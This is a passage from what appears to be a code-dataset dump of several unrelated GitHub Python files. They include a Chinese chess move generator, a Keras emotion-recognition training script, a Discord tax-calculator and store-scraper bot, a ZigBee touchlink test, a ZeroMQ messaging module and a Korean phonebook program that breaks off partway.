CchessEnv.board_pos_name[to_y][to_x])\n # 士\n elif board_positions[y][x] == 'a' and current_player == 'b':\n for i in range(-1, 3, 2):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 7 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 7 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif board_positions[y][x] == 'A' and current_player == 'w':\n for i in range(-1, 3, 2):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) \\\n and to_y <= 2 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) \\\n and to_y <= 2 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n # 将 帅\n elif board_positions[y][x] == 'k':\n k_x = x\n k_y = y\n if current_player == 'b':\n for i in range(2):\n for sign in range(-1, 2, 2):\n j = 1 - i\n to_y = y + i * sign\n to_x = x + j * sign\n\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) \\\n and to_y >= 7 and 3 <= to_x <= 5:\n moves.append(\n CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n )\n elif board_positions[y][x] == 'K':\n K_x = x\n K_y = y\n if current_player == 'w':\n for i in range(2):\n for sign in range(-1, 2, 2):\n j = 1 - i\n to_y = y + i * sign\n to_x = x + j * sign\n\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 2 and 3 <= to_x <= 5:\n moves.append(\n CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n )\n # 炮\n elif board_positions[y][x] == 'c' and current_player == 'b':\n to_y = y\n hits = False # 可不可以架炮\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n hits = False\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n to_x = x\n hits = False\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n hits = False\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n elif board_positions[y][x] == 'C' and current_player == 'w':\n to_y = y\n hits = False\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n hits = False\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n to_x = x\n hits = False\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n hits = False\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n # 兵\n elif board_positions[y][x] == 'p' and current_player == 'b':\n to_y = y - 1\n to_x = x\n\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if y < 5:\n to_y = y\n to_x = x + 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_x = x - 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n elif board_positions[y][x] == 'P' and current_player == 'w':\n to_y = y + 1\n to_x = x\n\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if y > 4:\n to_y = y\n to_x = x + 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_x = x - 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if K_x is not None and k_x is not None and K_x == k_x:\n face_to_face = True\n for i in range(K_y + 1, k_y, 1):\n if board_positions[i][K_x].isalpha():\n face_to_face = False\n\n if face_to_face is True:\n if current_player == 'b':\n moves.append(CchessEnv.board_pos_name[k_y][k_x] + CchessEnv.board_pos_name[K_y][K_x])\n else:\n moves.append(CchessEnv.board_pos_name[K_y][K_x] + CchessEnv.board_pos_name[k_y][k_x])\n\n return moves\n\n\nif __name__ == '__main__':\n import time\n state_str_test = \"RNBA1ABNR/4K4/1C5C1/P1PP2P1P/9/9/p1pp2p1p/1c5c1/4k4/rnba1abnr\"\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.get_legal_moves(state_str_test, \"w\")\n print(\"py get_legal_moves:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.get_legal_action(state_str_test, \"w\")\n print(\"C get_legal_moves:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.sim_do_action(\"a0a1\", state_str_test)\n print(\"py sim_do_action:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.sim_do_action(\"a0a1\", state_str_test)\n print(\"c sim_do_action:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.is_check_catch(state_str_test, \"w\")\n print(\"py is_check_catch:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.is_check_catch(state_str_test, \"w\")\n print(\"c is_check_catch:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.game_end(state_str_test, \"w\")\n print(\"py game_end:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.game_end(state_str_test, \"w\")\n print(\"c game_end:\", (time.time() - time_start) * 1000, \" ms\")\n","repo_name":"liyang619/JiangJun","sub_path":"env/cchess_env.py","file_name":"cchess_env.py","file_ext":"py","file_size_in_byte":38231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7680075330","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 12 14:11:11 2022\n\n@author: aakaa\n\"\"\"\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense,Flatten,Conv2D,Dropout,MaxPooling2D\nimport os\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport cv2\n\nImgH=48\nImgW=48\nbSize=16\ndataDir=r'D:\\Datasets\\FER\\masmbre\\archive (1)\\train'\ncategories=os.listdir(dataDir)\n\ntestData=r'D:\\Datasets\\FER\\masmbre\\archive (1)\\test'\ntrainDataGen=ImageDataGenerator(rescale=1./255,\n rotation_range=30,\n shear_range=0.3,\n zoom_range=0.3,\n horizontal_flip=True,\n fill_mode='nearest')\n\nvalidationDataGen=ImageDataGenerator(rescale=1./255)\n\ntrainData=trainDataGen.flow_from_directory(directory=dataDir,\n target_size=(ImgH,ImgW),\n color_mode='grayscale',\n class_mode='categorical',\n batch_size=bSize,\n shuffle=True)\n\nvalidationData=validationDataGen.flow_from_directory(directory=testData,\n target_size=(ImgH,ImgW),\n color_mode='grayscale',\n class_mode='categorical',\n batch_size=bSize,\n shuffle=True)\n\nimg,label=trainData.__next__()\n\ni=random.randint(0,(img.shape[0])-1)\nimage=img[i]\nlabl=categories[label[i].argmax()]\ncv2.imshow(labl,image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nmodel=Sequential()\nmodel.add(Conv2D(32,kernel_size=(3,3),activation='relu',input_shape=(128,128,1)))\nmodel.add(Conv2D(64, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(128, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(256, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(512, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024,activation='relu'))\nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(7,activation='softmax'))\n\nmodel.compile(optimizer = 'adam', loss='categorical_crossentropy', metrics=['accuracy'])\nprint(model.summary())\n\n\nnumTrainImg=0\nfor root,dirs,files in os.walk(dataDir):\n numTrainImg+=len(files)\n \nnumTestImg=0\nfor root,dirs,files in os.walk(testData):\n numTestImg+=len(files)\n \nnumEpochs=100\nmodelHistory=model.fit(trainData,\n steps_per_epoch=numTrainImg//bSize,\n epochs=numEpochs,\n validation_data=validationData,\n validation_steps=numTestImg//bSize)\n\n\n\nmodel.save('FER100Epochs.h5')","repo_name":"Shri-Aakash/FER-CNN","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13233542670","text":"#Taxes Functionalities\nimport string\nfrom typing import Final, final\nimport discord\nfrom discord import client\nfrom discord.ext import commands\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import AttributeValueWithCharsetSubstitution\nfrom discord.ext.commands.errors import PrivateMessageOnly\nimport requests\nimport lxml\nimport ArgentoTxt\n\n\nerrorMessage = \"Error, caracter o petición invalida.\" #well, the error message you want to show\ntodoslosImpuestos = 1.66 #taxes summed up, details in texts.py\n\nclass Example(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n #Events\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"Impuestos cog has been loaded!\")\n \n #Commands\n @commands.command(aliases=[\"calchelp\"])\n async def CALCHELP(self, ctx):\n await ctx.send(ArgentoTxt.calcHelp)\n\n #Impuesto Digital\n #+ST used to refer to steam, thats why in the code it is mentioned the way it is\n @commands.command(aliases=[\"st\"])\n async def ST(self, ctx, * argument : float):\n if argument[0] == int or float:\n steam = argument[0]\n if steam > 0:\n steamconimpu = steam * todoslosImpuestos\n impuestos = steamconimpu - steam \n await ctx.send(f\"El valor base es `{steam}`\\n Con impuestos sube a `{round(steamconimpu, 3)}`\\n El valor de los impuestos es: `{round(impuestos, 3)}`\")\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n\n\n #Steam Items\n @commands.command(aliases=[\"sti\"])\n async def STI(self, ctx, * argument : float):\n tubien = argument[0]\n bien = tubien * todoslosImpuestos\n tubiencomision = tubien * 0.90\n tubienfinal = tubiencomision * todoslosImpuestos\n if tubien > 0:\n await ctx.send(f\"Tu item de steam marketplace vale `{tubien}`\\n Si fueras a comprarlo cargando plata a Steam saldria `{round(bien, 3)}`\\n Al venderlo en marketplace vale `{round(tubiencomision, 3)}`\\n Por tanto, su precio de venta en dinero real es `{round(tubienfinal, 3)}`\")\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n\n\n #Steam scraping\n @commands.command(aliases=[\"sts\"])\n async def STS(self, ctx, argument):\n if (argument.find(\"https://store.steampowered.com/app\") == -1):\n await ctx.send(\"Error, ese link no se puede procesar, solo los de https://store.steampowered.com/app son utilizables\")\n else:\n r = requests.get(argument)\n soup = BeautifulSoup(r.content, \"lxml\")\n name = soup.find(\"div\", class_=\"apphub_AppName\").text\n prices = \"\"\n\n #First of all: we get all the prices\n for x in soup.find_all(\"div\", class_=\"game_purchase_action_bg\"):\n prices = f\"{prices} ~ {x.get_text()}\"\n\n #We do this in order to be sure it is the price we want because prices contains all the prices in the page\n prices = prices.strip()\n prices = prices.split(\"~\")\n firstPrice = prices[1].strip()\n\n #If it can finde free: its free\n if (firstPrice.find(\"Free\") > -1):\n await ctx.send(f\"`{name} es gratuito!`\")\n\n #If it can find download: then it is a demo\n elif (firstPrice.find(\"Download\") > -1):\n await ctx.send(f\"`{name} tiene/es una demo!`\")\n\n #if you can put it in your cart, then it is a paid game \n elif (firstPrice.find(\"Add to Cart\") > -1):\n\n #Getting the last price in the string, works with games on discount and those who are not\n firstPrice = firstPrice.split(\"$\")\n firstPrice = firstPrice[-1]\n\n #Now, to avoid a million methods() we'll check if its a character we want\n final = \"\"\n for x in firstPrice:\n if x.isdigit() == True: \n final += x\n elif x == \",\":\n final += \".\"\n \n #Finally, we get a float and then the taxes are calculated\n final = float(final)\n steamConImpu = final * todoslosImpuestos\n impuestos = steamConImpu - final\n await ctx.send(f\"El juego es `{name}`\\nVale `{final}`\\nCon impuestos sube a `{round(steamConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n else: \n await ctx.send(\"Error\")\n\n #Ubisoft scraping\n @commands.command(aliases=[\"ubi\"])\n async def UBI(self, ctx, argument):\n #First of all, we start by looking if it is a ubisoft official link\n if ((argument.find(\"https://store.ubi.com\") == -1)):\n await ctx.send(\"Error, ese link no se puede procesar, solo los de https://store.ubi.com son utilizables\")\n else:\n #Getting all we need\n r = requests.get(argument)\n soup = BeautifulSoup(r.content, \"lxml\")\n\n price = soup.find(\"div\", class_=\"flex-reverse-order\").text\n name = soup.find(\"span\", class_=\"product-title-wrapper product-name product-header-name\").text\n name = name.strip()\n price = price.strip()\n \n #IN the ubisoft store, if a game is free, it has nothing in the price related div, just empty spaces, thats why there is a strip method\n if price == \"\": await ctx.send(f\"El juego es `{name}`\\n`Es Gratuito!`\")\n else:\n #Now that we know it is not free, price is converted to a float\n price = price.replace(\".\", \"\").split(\"$\")\n price = price[1].strip()\n price = price.replace(\",\", \".\")\n price = float(price)\n #Calculating taxes...\n priceConImpu = price * todoslosImpuestos\n impuestos = priceConImpu - price\n\n #Last part: the description only appears on DLCs for some reason, even though it should be found on games also\n #If it has a Description, it will send it, if it doesnt it wont even try\n if (soup.find(\"span\", class_=\"product-header-edition similar-with-h2\") != None):\n\n description = soup.find(\"span\", class_=\"product-header-edition similar-with-h2\").text\n description = description.split(\"-\")\n description = description[0].strip()\n\n await ctx.send(f\"El juego es `{name}`\\nMás exactamente `{description}`\\nVale `{price}`\\nCon impuestos sube a `{round(priceConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n else: await ctx.send(f\"El juego es `{name}`\\nVale `{price}`\\nCon impuestos sube a `{round(priceConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n\n\ndef setup(client):\n client.add_cog(Example(client))","repo_name":"Ale-SaP/ArgentoBot","sub_path":"cogs/impuestos.py","file_name":"impuestos.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74326918913","text":"\"\"\"\n@testcase\n@description 2.1 TP-PRE-TC-00: Network start - ZED & ZR factory new\n\n@tags\n POSITIVE\n \n@connection dummyPort = router\n\"\"\"\n\n#*****************************************************************************************\n#Defines section\n#*****************************************************************************************\nimport sys\nsys.path.append(scriptPath)\nfrom common import *\nfrom deviceScanner import *\nsys.path.remove(scriptPath)\n\n#*****************************************************************************************\n# Initialization\n#*****************************************************************************************\\\nportList = []\n\nconfigureCommunication()\n\ned1 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_END_DEVICE, portList)\ned2 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_END_DEVICE, portList)\nr1 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_ROUTER, portList)\nr2 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_ROUTER, portList)\n\n#*****************************************************************************************\n#Script body - feature checking\n#*****************************************************************************************\nwriteLog(\"Resetting nodes to FN\")\nresetRouterToFN([r1, r2])\nresetEndDeviceToFN([ed1, ed2])\nclearPorts([r1, r2, ed1, ed2])\n\nwriteLog(\"Resetting mac ban table\")\nresetBanTable([r1, r2, ed1, ed2])\n\ned1ExtAddr = getExtAddr(ed1)\nwriteLog(\"ED1 extended address - %016X\" % ed1ExtAddr)\n\ned2ExtAddr = getExtAddr(ed2)\nwriteLog(\"ED2 extended address - %016X\" % ed2ExtAddr)\n\nr1ExtAddr = getExtAddr(r1)\nwriteLog(\"R1 extended address - %016X\" % r1ExtAddr)\n\nr2ExtAddr = getExtAddr(r2)\nwriteLog(\"R2 extended address - %016X\" % r1ExtAddr)\n\nwriteLog(\"Change link quality between R1, R2, ED2 and ED1\")\nsetRssiForExtAddress([r1, r2, ed2], ed1ExtAddr, touchlinkRssiThreshold - 10)\n\nsetTargetType(r1, TARGET_TYPE_TOUCHLINK)\nsleep(2)\n\nwriteLog(\"2a Start touchlink ED1 to R1\")\nsendCommand(ed1, touchlickCmd)\nwriteLog(\"2b No scan response indication on ED1\")\nidle([ed1, r1, r2])\n\nwriteLog(\"Revert link quality between R1 and ED1\")\nresetBanTable([r1])\nsetTargetType(r1, TARGET_TYPE_TOUCHLINK)\nsleep(2)\n\nwriteLog(\"3 Start touchlink ED1 to R1\")\nsendCommand(ed1, touchlickCmd)\nwriteLog(\"4 Scan response indication on ED1\")\nreceiveAndCheck(ed1, scanRespIndStr)\n","repo_name":"binaryArrow/airquality","sub_path":"BitCloud_Dateien/Evaluation Tools/ZLL_Scripts/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2436764995","text":"from concurrent.futures import ThreadPoolExecutor\nimport random\n\nfrom dill import dumps, loads\nfrom toolz import merge, get\nimport trollius as asyncio\nfrom trollius import From, Return, Task\nimport zmq\n\ncontext = zmq.Context()\n\n\n@asyncio.coroutine\ndef comm(ip, port, bind_ip, signal_q, control_q, outgoing_q,\n loop=None, context=None):\n \"\"\" Communications coroutine\n\n Input Channels:\n ZMQ router: from outside world\n signal_q: to break waits on the router\n outgoing_q: data that needs to be sent out on the router\n\n Output Channels:\n ZMQ router: to the outside world\n control_q: put messages from outside world here for handling\n\n Interacts with:\n send, control\n \"\"\"\n loop = loop or asyncio.get_event_loop()\n context = context or zmq.Context()\n\n router = context.socket(zmq.ROUTER)\n router.bind('tcp://%s:%d' % (bind_ip, port))\n\n dealer = context.socket(zmq.DEALER)\n dealer.connect('tcp://127.0.0.1:%d' % port)\n\n wait_signal = Task(signal_q.get(), loop=loop)\n\n while True:\n wait_router = delay(loop, router.recv_multipart)\n [first], [other] = yield From(asyncio.wait([wait_router, wait_signal],\n return_when=asyncio.FIRST_COMPLETED))\n\n if first is wait_signal: # Interrupt socket recv\n dealer.send(b'break')\n addr, data = yield From(wait_router) # should be fast\n assert data == b'break'\n\n while not outgoing_q.empty(): # Flow data out\n addr, msg = outgoing_q.get_nowait()\n router.send_multipart([addr, msg])\n print(\"Message sent\")\n\n if first is wait_signal: # Handle internal messages\n msg = wait_signal.result()\n if msg == b'close':\n control_q.put_nowait((None, b'close'))\n break\n elif msg == b'interrupt':\n wait_signal = Task(signal_q.get(), loop=loop)\n continue\n elif first is wait_router: # Handle external messages\n addr, byts = wait_router.result()\n msg = loads(byts)\n print(\"Communication received: %s\" % str(msg))\n control_q.put_nowait((addr, msg))\n\n router.close(linger=2)\n dealer.close(linger=2)\n\n raise Return(\"Comm done\")\n\n\n@asyncio.coroutine\ndef pingpong(pingpong_q, send_q):\n \"\"\" A simple pingpong coroutine\n\n Input Channels:\n pingpong_q: should have messages of the form\n (address, {'op': 'ping'}\n\n Output Channels:\n send_q: send out messages of the form\n (address, b'pong')\n \"\"\"\n print(\"pingpong boots up\")\n while True:\n addr, msg = yield From(pingpong_q.get())\n if msg == b'close':\n break\n\n send_q.put_nowait((addr, b'pong'))\n\n raise Return(\"PingPong done\")\n\n\n@asyncio.coroutine\ndef control(control_q, out_qs):\n \"\"\" Control coroutine, general dispatch\n\n Input Channels:\n control_q: Mailbox for any messages that come in from comm\n\n Output Channels:\n out_qs: a dictionary of operator: queue pairs\n {'compute': compute_q, 'pingpong': pingpong_q}\n\n \"\"\"\n print(\"Control boots up\")\n while True:\n addr, msg = yield From(control_q.get())\n if msg == b'close':\n for q in set(out_qs.values()):\n q.put_nowait((addr, b'close'))\n break\n try:\n q = out_qs[msg['op']]\n except KeyError:\n raise NotImplementedError(\"Don't know how to route: %s\" % msg)\n q.put_nowait((addr, msg))\n\n raise Return(\"Control done\")\n\n\n@asyncio.coroutine\ndef send(send_q, outgoing_q, signal_q):\n \"\"\" Prep outgoing data before sending out on the wire\n\n In particular the router is currently doing a blocking recv. We need to\n load an interrupt onto the signal queue as we load up the message onto the\n outgoing queue\n\n Input Channels:\n send_q: Messages of (addr, obj) pairs\n\n Output Channels:\n outgoing_q: Messages of (addr, bytes) pairs\n signal_q: An interrupt signal to break the current block on the socket\n \"\"\"\n print(\"Send boots up\")\n while True:\n addr, msg = yield From(send_q.get())\n if msg == b'close':\n break\n\n print(\"Enque outgoing message: %s\" % str(msg))\n if not isinstance(msg, bytes):\n msg = dumps(msg)\n outgoing_q.put_nowait((addr, msg))\n signal_q.put_nowait('interrupt')\n\n raise Return(\"Send done\")\n\n\n@asyncio.coroutine\ndef dealer_send_recv(loop, addr, data):\n socket = context.socket(zmq.DEALER)\n socket.connect(addr)\n if not isinstance(data, bytes):\n data = dumps(data)\n yield From(delay(loop, socket.send, data))\n result = yield From(delay(loop, socket.recv))\n socket.close() # TODO: LRU sockets\n try:\n result = loads(result)\n except Exception as e:\n print(e)\n raise Return(result)\n\n\nexecutor = ThreadPoolExecutor(20)\n\n\ndef delay(loop, func, *args, **kwargs):\n \"\"\" Run function in separate thread, turn into coroutine \"\"\"\n future = executor.submit(func, *args, **kwargs)\n return asyncio.futures.wrap_future(future, loop=loop)\n","repo_name":"mrocklin/dist","sub_path":"dist/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10144744726","text":"#폰북 리스트\npList = [\n {\"name\":\"friend1\", \"phone\":\"010-1111-1111\", \"addr\":\"서울시 종로구\"},\n {\"name\":\"friend2\", \"phone\":\"010-2222-2222\", \"addr\":\"수원시 팔달구\"},\n {\"name\":\"friend3\", \"phone\":\"010-3333-3333\", \"addr\":\"부산시 사하구\"},\n {\"name\":\"friend2\", \"phone\":\"010-4444-4444\", \"addr\":\"광주시 송정동\"},\n {\"name\":\"friend4\", \"phone\":\"010-4444-4444\", \"addr\":\"광주시 송정동\"}\n]\n\nwhile True:\n print(\"1.입력 2.출력 3.검색 4.수정 5.삭제 6.종료\")\n no = int(input(\"선택: \"))\n if no == 1 :\n print(\"{:-^50}\".format(\" 입력기능 \"))\n # 친구 정보를 저장 하기위해 딕셔너리를 준비한다.\n people = {}\n # 딕셔너리에 키에 대응하는 값을 입력 받는다.\n people[\"name\"] = input(\"성명>>> \")\n people[\"phone\"] = input(\"전화>>> \")\n people[\"addr\"] = input(\"주소>>> \")\n # 친구 정보가 저장 된 데이터를 리스트에 추가한다.\n pList.append(people)\n print(\"주소 입력 완료!\")\n elif no == 2 :\n print(\"{:-^50}\".format(\" 출력기능 \"))\n # 목록의 필드 제목을 출력 한다.\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(\"번호\", \"성명\", \"전화\", \"주소\") )\n print(\"-\"*53)\n # for 반복문을 이용해서 리스트의 내용을 화면에 출력한다.\n for i, p in enumerate(pList) :\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(i+1,p[\"name\"],p[\"phone\"],p[\"addr\"]))\n elif no == 3 :\n print(\"{:-^50}\".format(\" 검색기능 \"))\n # 검색 할 이름을 입력 받아서 변수에 저장한다.\n search_name = input(\"검색 할 이름 입력>>> \")\n # 입력 받은 내용이 없다면 다시 입력 받는다.\n while(len(search_name) == 0) :\n print(\"검색어를 1글자 이상 입력 하세요!\")\n search_name = input(\"검색 할 이름 입력>>> \")\n # 중복된 이름이 있을 수 있기 때문에 검색한 데이터를 저장할 리스트를 준비한다.\n search_list = [];\n # 리스트의 내용을 하나씩 검색한다.\n for i, p in enumerate(pList) :\n # 검색어와 같은 이름이 있다면 미리 준비된 리스트에 추가 한다.\n if(p[\"name\"] == search_name) :\n search_list.append(p);\n # 검색 내용이 없다면 검색 내용이 없다는 메세지를 출력한다.\n if(len(search_list) == 0) :\n print(search_name+\"으로 검색 한 내용이 없습니다.\")\n else :\n # 검색 내용이 있다면 검색 내용을 출력 한다.\n for i, p in enumerate(search_list) :\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(i+1,p[\"name\"],p[\"phone\"],p[\"addr\"]))\n elif no == 4 :\n print(\"{:-^50}\".format(\" 수정기능 \"))\n # 목록에서 수정 할 번호를 선택한다.\n modify_no = int(input(\"수정 할 번호 입력>>> \"))\n # 리스트의 범위 보다 초과된 값이 입력되면 다시 입력 받도록 한다.\n while(modify_no<1 or modify_no>len(pList)) :\n print(\"입력 범위를 초과 했습니다!\")\n modify_no = int(input(\"수정 할 번호 입력>>> \"))\n # 목록의 인덱스르로 사용하기 위해서 번호-1을 한다. 인덱스튼 0부터 시작하기 때문이다.\n modify_no -= 1;\n # 성명, 전화번호, 주소 중에 수정 할 항목을 선택 한다.\n print(\"\\n수정 할 항목을 입력 하세요.\")\n print(\"1.성명 2.전화번호 3.주소 4.모두\")\n modify_select = int(input(\"선택>>> \"))\n if(modify_select == 1) :\n pList[modify_no][\"name\"] = input(\"새 이릅 입력>>> \")\n elif (modify_select == 2):\n pList[modify_no][\"phone\"] = input(\"새 전화번호 입력>>> \")\n elif (modify_select == 3):\n pList[modify_no][\"addr\"] = input(\"새 주소 입력>>> \")\n elif (modify_select == 4) :\n # 성명, 전화번호, 주소를 한꺼번에 수정 하는 메뉴\n pList[modify_no][\"name\"] = input(\"새 이릅 입력>>> \")\n pList[modify_no][\"phone\"] = input(\"새 전화번호 입력>>> \")\n pList[modify_no][\"addr\"] = input(\"새 주소 입력>>> \")\n else :\n print(\"선택 항목이 없습니다!\")\n elif no == 5 :\n print(\"{:-^50}\".format(\" 삭제기능 \"))\n # 목록에서 삭제할 번호를 입력 받는다.\n delete_no = int(input(\"삭제 할 번호 입력>>> \"))\n # 목록의 수보다 초과된 값이 들어오면 다시 입력 받는다.\n while (delete_no < 1 or delete_no > len(pList)):\n print(\"입력 범위를 초과 했습니다!\")\n 